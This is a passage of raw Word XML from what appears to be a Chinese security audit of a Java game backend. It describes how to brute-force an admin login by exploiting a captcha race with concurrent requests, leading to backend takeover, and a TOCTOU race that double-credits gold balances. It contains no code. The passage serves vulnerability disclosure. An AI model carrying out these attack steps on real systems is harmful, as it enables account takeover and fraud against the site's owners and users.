          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>captchaCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段各不相同的大量 JSON 登录请求体；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用并发工具（Burp Suite Turbo Intruder、Python asyncio、ab/wrk 等），在极短时间窗口内将所有请求同时发出；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">由于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DELETE key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 之间存在时间窗口，多个并发请求均能从 Redis 读取到同一验证码值并通过校验；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>每获取一张验证码可并发尝试数十至数百个密码候选，显著压缩破解成本；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="160"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">重复步骤 1-6，持续对管理员账号进行枚举，直至命中正确凭据，获取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="161"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">使用返回的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 调用受保护的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/adminManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等接口，实现完整后台接管。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="162"/>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/admin/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ADMIN_PUBLIC_PATHS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中被 Spring Security 完全放行）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="163"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：完全无需任何现有凭证，任意互联网访问者均可发起攻击</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64"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AdminLoginController.java.login → AdminCaptchaService.java.verify</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audit_m052_175_login_ctrl-path17of19.md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：ArchiveService.java#settleArchiveGoldNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_9" w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞8：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>settleArchiveGoldNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中 TOCTOU 竞态条件导致金币余额重复结算</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="16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：并发存档请求竞态条件致金币余额倍增（Race Condition / TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="16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src/main/java/com/gameBack/mjservice/service/ArchiveService.java:settleArchiveGoldNew</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="16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16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6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numPr>
          <w:numId w:val="17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settleArchiveGoldNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 负责按「上次存档时间 → 本次存档时间」的差值结算金币。其核心保护逻辑是：结算完成后将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 更新为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，从而防止同一时段被重复结算。然而，该保护存在两个关键缺陷的组合：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="171"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>读取保护变量（`lastArchiveTime`）使用的是事务开始时加载到 JPA 一级缓存中的 `User` 内存对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，并非从数据库重新锁定读取。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="172"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`goldToAdd` 的计算发生在 `findByUserIdForUpdate`（行级锁）之外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。获取账户行锁时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已经用过期的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchive = T1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 算好了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>当两个并发事务同时到达：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="173"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">事务 A、B 均在事务开始时读取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>user.lastArchiveTime = T1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（JPA 一级缓存）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="174"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两者均通过 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>if (lastArchive == null || seconds &lt;= 0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前置检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两者均在进入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ifPresent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 块之前计算出相同的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd = hashRate × (now − T1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>事务 A 先获得账户行锁（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），写入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，提交，并将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchiveTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 更新为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>T_now</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="177"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">事务 B 等待行锁释放后获得锁，读到事务 A 写入后的账户余额，但其内存中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>lastArchive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>T1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 已在锁外预先计算完毕，此时直接叠加相同金额</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最终效果：同一时段的金币奖励被结算了两次（乃至多次）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="17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入口 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/game/archive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>saveArchiveNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，事务开始时加载 User 实体入 JPA 一级缓存）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>settleArchiveGoldNew</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（使用缓存 User 对象的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>getLastArchiveTime()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 计算 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>goldToAdd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，在行锁外完成）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userAccountRepository.findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（行锁仅保护账户写入的序列化，无法使 B 重新读取 User 最新状态）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
